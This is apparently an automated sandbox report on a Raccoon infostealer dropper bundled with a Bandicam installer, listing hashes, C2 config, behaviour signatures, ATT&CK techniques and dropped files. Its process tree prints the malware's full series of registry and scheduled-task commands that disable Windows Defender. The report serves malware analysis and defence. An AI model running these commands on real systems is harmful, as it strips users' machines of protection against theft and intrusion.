Analysis

  • max time kernel
    99s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    17-04-2022 14:39

General

  • Target

    7534d7a1a6f5e505eebdb73af2e4c87e020e8fea8d8eb662a1d2527d200bae5b.exe

  • Size

    29.8MB

  • MD5

    e41c2310bd6b0f9482ac2ffda7a54f62

  • SHA1

    a9dfe08f5b23dc8e1b4e75c061d9594954eca132

  • SHA256

    7534d7a1a6f5e505eebdb73af2e4c87e020e8fea8d8eb662a1d2527d200bae5b

  • SHA512

    0388f6bb7654c97ef014595694423c9c0a2626226ba57461a6efef5e1fc2c33b9cb09df8a4fd4887ed1aa62cf8c6cda19694bcc9fc8c28b9ca514d5b57e99905

Malware Config

Extracted

Family

raccoon

Botnet

c763e433ef51ff4b6c545800e4ba3b3b1a2ea077

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 9 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 11 IoCs
  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7534d7a1a6f5e505eebdb73af2e4c87e020e8fea8d8eb662a1d2527d200bae5b.exe
    "C:\Users\Admin\AppData\Local\Temp\7534d7a1a6f5e505eebdb73af2e4c87e020e8fea8d8eb662a1d2527d200bae5b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3552
    • C:\Users\Admin\AppData\Local\Temp\is-1CRVM.tmp\7534d7a1a6f5e505eebdb73af2e4c87e020e8fea8d8eb662a1d2527d200bae5b.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-1CRVM.tmp\7534d7a1a6f5e505eebdb73af2e4c87e020e8fea8d8eb662a1d2527d200bae5b.tmp" /SL5="$901F0,30487901,760832,C:\Users\Admin\AppData\Local\Temp\7534d7a1a6f5e505eebdb73af2e4c87e020e8fea8d8eb662a1d2527d200bae5b.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2200
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\46vZVW\MMF.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:5092
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\46vZVW\DisableOAVProtection.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            5⤵
              PID:3484
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              5⤵
                PID:1508
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                5⤵
                  PID:3308
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  5⤵
                    PID:4080
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    5⤵
                      PID:4712
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      5⤵
                        PID:1032
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        5⤵
                          PID:2884
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          5⤵
                            PID:2840
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:1296
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:1620
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:3524
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:864
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                    5⤵
                                      PID:3216
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      5⤵
                                        PID:5080
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:4196
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                          5⤵
                                            PID:2968
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            5⤵
                                              PID:3744
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              5⤵
                                                PID:2304
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                5⤵
                                                  PID:888
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  5⤵
                                                    PID:4896
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                    5⤵
                                                      PID:2708
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                      5⤵
                                                        PID:4084
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                        5⤵
                                                          PID:1088
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                          5⤵
                                                            PID:3264
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                            5⤵
                                                              PID:2604
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                              5⤵
                                                                PID:4868
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                5⤵
                                                                  PID:3152
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                  5⤵
                                                                    PID:1916
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                    5⤵
                                                                      PID:1928
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                      5⤵
                                                                        PID:3860
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                        • Modifies security service
                                                                        PID:2608
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                          PID:2212
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\46vZVW\main.bat" "
                                                                        4⤵
                                                                          PID:4280
                                                                          • C:\Windows\SysWOW64\mode.com
                                                                            mode 65,10
                                                                            5⤵
                                                                              PID:5084
                                                                            • C:\ProgramData\46vZVW\7z.exe
                                                                              7z.exe e file.zip -p___________26746pwd7947pwd24935___________ -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3952
                                                                            • C:\ProgramData\46vZVW\7z.exe
                                                                              7z.exe e extracted/file_3.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4076
                                                                            • C:\ProgramData\46vZVW\7z.exe
                                                                              7z.exe e extracted/file_2.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5060
                                                                            • C:\ProgramData\46vZVW\7z.exe
                                                                              7z.exe e extracted/file_1.zip -oextracted
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3808
                                                                            • C:\ProgramData\46vZVW\0012_protected.exe
                                                                              "0012_protected.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Loads dropped DLL
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3628
                                                                              • C:\ProgramData\46vZVW\0012_protected.exe
                                                                                "0012_protected.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4008
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 484
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:2596
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 488
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:1644
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\ProgramData\46vZVW\DiskRemoval.bat" "
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:32
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /T 60 /NOBREAK
                                                                              5⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:2020
                                                                        • C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
                                                                          "C:\Program Files (x86)\Bandicam.4.5.8.1673.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4560
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-OMVIE.tmp\Bandicam.4.5.8.1673.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-OMVIE.tmp\Bandicam.4.5.8.1673.tmp" /SL5="$301FA,22575714,93696,C:\Program Files (x86)\Bandicam.4.5.8.1673.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:4448
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4008 -ip 4008
                                                                      1⤵
                                                                        PID:5008
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4008 -ip 4008
                                                                        1⤵
                                                                          PID:3104

                                                                        Network

                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                        Persistence

                                                                        Modify Existing Service

                                                                        2
                                                                        T1031

                                                                        Defense Evasion

                                                                        Modify Registry

                                                                        2
                                                                        T1112

                                                                        Disabling Security Tools

                                                                        1
                                                                        T1089

                                                                        Virtualization/Sandbox Evasion

                                                                        1
                                                                        T1497

                                                                        Discovery

                                                                        Query Registry

                                                                        3
                                                                        T1012

                                                                        Virtualization/Sandbox Evasion

                                                                        1
                                                                        T1497

                                                                        System Information Discovery

                                                                        4
                                                                        T1082

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
                                                                          Filesize

                                                                          21.9MB

                                                                          MD5

                                                                          a6627fb2c2e3874325259bf000571fdf

                                                                          SHA1

                                                                          3d521136f3445aae539080e74a80d40a67d543a2

                                                                          SHA256

                                                                          dbc86639649df20836a209414eeaed1e83b4e0d26d82f5e94c671d36d9da7738

                                                                          SHA512

                                                                          122a996be74b2a971fac731a6058e59d2c57497db52ced2e6a8ad46e81c367111a0e3a0d32dfc585a77b43d84d7e0b1e7a00f465e8f9ad66d63df1fe309bdca3

                                                                        • C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
                                                                          Filesize

                                                                          21.9MB

                                                                          MD5

                                                                          a6627fb2c2e3874325259bf000571fdf

                                                                          SHA1

                                                                          3d521136f3445aae539080e74a80d40a67d543a2

                                                                          SHA256

                                                                          dbc86639649df20836a209414eeaed1e83b4e0d26d82f5e94c671d36d9da7738

                                                                          SHA512

                                                                          122a996be74b2a971fac731a6058e59d2c57497db52ced2e6a8ad46e81c367111a0e3a0d32dfc585a77b43d84d7e0b1e7a00f465e8f9ad66d63df1fe309bdca3

                                                                        • C:\ProgramData\46vZVW\0012_protected.exe
                                                                          Filesize

                                                                          6.1MB

                                                                          MD5

                                                                          bfa9f46f5679d14bfa7248345a0b8a97

                                                                          SHA1

                                                                          8a5fddc5b1273601896a2501e25de1fa537a50d9

                                                                          SHA256

                                                                          3d6274e2af3615d5f62ee80f01a51a2e263a30b73bd83a3031eb7e76761c3dae

                                                                          SHA512

                                                                          29022d8496b39840e4d00d9be5f57e73c1989f1f9a5cd0d8ca0f814267ef3de1a7fcc83b60fa973ff233e78ed1abe2bdd17376bca658483054ff4eedf0abffa3

                                                                        • C:\ProgramData\46vZVW\0012_protected.exe
                                                                          Filesize

                                                                          6.1MB

                                                                          MD5

                                                                          bfa9f46f5679d14bfa7248345a0b8a97

                                                                          SHA1

                                                                          8a5fddc5b1273601896a2501e25de1fa537a50d9

                                                                          SHA256

                                                                          3d6274e2af3615d5f62ee80f01a51a2e263a30b73bd83a3031eb7e76761c3dae

                                                                          SHA512

                                                                          29022d8496b39840e4d00d9be5f57e73c1989f1f9a5cd0d8ca0f814267ef3de1a7fcc83b60fa973ff233e78ed1abe2bdd17376bca658483054ff4eedf0abffa3

                                                                        • C:\ProgramData\46vZVW\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • C:\ProgramData\46vZVW\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • C:\ProgramData\46vZVW\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • C:\ProgramData\46vZVW\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • C:\ProgramData\46vZVW\7z.dll
                                                                          Filesize

                                                                          1.6MB

                                                                          MD5

                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                          SHA1

                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                          SHA256

                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                          SHA512

                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                        • C:\ProgramData\46vZVW\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\46vZVW\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\46vZVW\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\46vZVW\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\46vZVW\7z.exe
                                                                          Filesize

                                                                          458KB

                                                                          MD5

                                                                          619f7135621b50fd1900ff24aade1524

                                                                          SHA1

                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                          SHA256

                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                          SHA512

                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                        • C:\ProgramData\46vZVW\DisableOAVProtection.bat
                                                                          Filesize

                                                                          33KB

                                                                          MD5

                                                                          c97c64f53865b9da2a642d36b02df043

                                                                          SHA1

                                                                          181ca1deb68409feae2e70ebf347b3111218a47a

                                                                          SHA256

                                                                          1e37317e8e44fcf8ee132870eb137021e8828be99dcc69d1167f1bce9fb24e17

                                                                          SHA512

                                                                          05ef252545d9315a100ba2e109499c0596fd8a0d02679e42d0e3a2f3047518ded7cf342ce9c414b48387ff102d516c3fbc7b4dcbf1bb445e2a23ed9c6092ec2c

                                                                        • C:\ProgramData\46vZVW\DiskRemoval.bat
                                                                          Filesize

                                                                          211B

                                                                          MD5

                                                                          0f00552cee3a31dc4e8adc2738ca6d76

                                                                          SHA1

                                                                          85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                          SHA256

                                                                          1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                          SHA512

                                                                          137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                        • C:\ProgramData\46vZVW\MMF.vbs
                                                                          Filesize

                                                                          20KB

                                                                          MD5

                                                                          fa6dcfa398aff28ba12687272732eb51

                                                                          SHA1

                                                                          f207b64cfd0270d6f2222e2fac98ef9c262dd313

                                                                          SHA256

                                                                          f2df2c8ac96c7c2e54afe992b302d823dc62d5754b6882b5ffdf19c293fc298d

                                                                          SHA512

                                                                          9064b3a25b2c1dcfd2d91ec28fe4e61843739d3fc6a630bf46055b8e6198b546398e06e81c62a7ae47c8316f162145b81d228d3bcbc5a9ee44b458aba6f59dfd

                                                                        • C:\ProgramData\46vZVW\extracted\0012_protected.exe
                                                                          Filesize

                                                                          6.1MB

                                                                          MD5

                                                                          bfa9f46f5679d14bfa7248345a0b8a97

                                                                          SHA1

                                                                          8a5fddc5b1273601896a2501e25de1fa537a50d9

                                                                          SHA256

                                                                          3d6274e2af3615d5f62ee80f01a51a2e263a30b73bd83a3031eb7e76761c3dae

                                                                          SHA512

                                                                          29022d8496b39840e4d00d9be5f57e73c1989f1f9a5cd0d8ca0f814267ef3de1a7fcc83b60fa973ff233e78ed1abe2bdd17376bca658483054ff4eedf0abffa3

                                                                        • C:\ProgramData\46vZVW\extracted\ANTIAV~1.DAT
                                                                          Filesize

                                                                          2.0MB

                                                                          MD5

                                                                          496c487f15977e6dea1e17756bb048ae

                                                                          SHA1

                                                                          db45b781b6435125e1d0a8a72fe65a9a4eafeb74

                                                                          SHA256

                                                                          a9c7237e86da2758cfe48eeca523ad1aefee900126ef028460ac1153bb6eee12

                                                                          SHA512

                                                                          f8d7c96aa22b98b6387116ccbb3727d7c4c100b74e25e8f9bcf59c1d72bfc1413e5b51ff30d294099fba55cff2d391f6fb97d36dcee82480dd7b40728ab4c784

                                                                        • C:\ProgramData\46vZVW\extracted\file_1.zip
                                                                          Filesize

                                                                          4.2MB

                                                                          MD5

                                                                          64ef59c913255d51127626ca3d0e4a87

                                                                          SHA1

                                                                          41b0ba40da93ca99ea8eda52ee10be82b3b238ae

                                                                          SHA256

                                                                          017cd5a5d7ca4ce0894a697ff1039bd600d46224aa09f338777af6e3e8710a62

                                                                          SHA512

                                                                          a3b5d1a23f13677dff0be745e52812b98399cec09567350b44b1dd8718ef16da83741229407bf04e8f0ca578c3eec5471250ba013e09caae1da9d3f74e8ee2c8

                                                                        • C:\ProgramData\46vZVW\extracted\file_2.zip
                                                                          Filesize

                                                                          4.2MB

                                                                          MD5

                                                                          8807f7b76fec78e2b716952d905dcfad

                                                                          SHA1

                                                                          77fe75836fcf8b62d9e259cb6f2732fc4cbe57ec

                                                                          SHA256

                                                                          aed7fd40b93d424bd76f4904a509e324a89f2d4cc0099174e733deb75683c4c1

                                                                          SHA512

                                                                          4b4437eb69af7d2fe50027b09f0910d22fcd7c7b883541c398bb40f41dda4d440ee40039e18fd7d4047fbef43fccd7970fc97892c1e717da1ef3bd8a9a3189be

                                                                        • C:\ProgramData\46vZVW\extracted\file_3.zip
                                                                          Filesize

                                                                          5.7MB

                                                                          MD5

                                                                          af26b257b32f5ea73545a048728ee92e

                                                                          SHA1

                                                                          fde3b0279534f28f54ae109419c1e9cbc6e93877

                                                                          SHA256

                                                                          17a6561d062850f0784cc67d1831b022da90ff978938260b5cda9e3c9c2457e2

                                                                          SHA512

                                                                          ae1f58356a0e4e195511e1a37c41b6476636cd32fbfec99d2eea8c52c4a9f3d16cd3cae9de985a44e89955797c0ffeae815a5c4daa01eab3c5deee4e39ea3354

                                                                        • C:\ProgramData\46vZVW\file.bin
                                                                          Filesize

                                                                          5.7MB

                                                                          MD5

                                                                          198e8229aa389cd76aae927a23eaf4d0

                                                                          SHA1

                                                                          c9133d099659ac27ace03887def0ca0fdec8479b

                                                                          SHA256

                                                                          c1e62db91efad233b6e4d121e25080a9646c683f68a2b93c6f2e48147d74f26a

                                                                          SHA512

                                                                          47ed30be5f84175e3b1627a8b759a19f30737419b98091c553a62c90dad7923bae9b4c53a6663573a5f112cadc3e412137f3d079092a5186774595da1a4715e5

                                                                        • C:\ProgramData\46vZVW\main.bat
                                                                          Filesize

                                                                          431B

                                                                          MD5

                                                                          f646b5c4d1fc8493a935366326a755b2

                                                                          SHA1

                                                                          920e791d2066bece9f0b24e08dc097a04515c0d6

                                                                          SHA256

                                                                          1e493655e3f0fa81ce549b9c7b5684008c484639ebd10bc1139dbecbfb252e22

                                                                          SHA512

                                                                          5cfb666e02ccbc5474924b2c5aa6fe3d16a88946ce32729148e650f0459193461bfa6b569c30a55dfac1595db120db73981d98bc1081fdac61e24377e09d75f3

                                                                        • C:\Users\Admin\AppData\Local\Temp\2b2090a9-19a0-4f7c-b5db-cf55a3691c65\AgileDotNetRT.dll
                                                                          Filesize

                                                                          94KB

                                                                          MD5

                                                                          14ff402962ad21b78ae0b4c43cd1f194

                                                                          SHA1

                                                                          f8a510eb26666e875a5bdd1cadad40602763ad72

                                                                          SHA256

                                                                          fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

                                                                          SHA512

                                                                          daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

                                                                        • C:\Users\Admin\AppData\Local\Temp\b35bc50e-fc56-4239-a7d0-bb79118b31c9\AgileDotNetRT.dll
                                                                          Filesize

                                                                          94KB

                                                                          MD5

                                                                          14ff402962ad21b78ae0b4c43cd1f194

                                                                          SHA1

                                                                          f8a510eb26666e875a5bdd1cadad40602763ad72

                                                                          SHA256

                                                                          fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

                                                                          SHA512

                                                                          daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

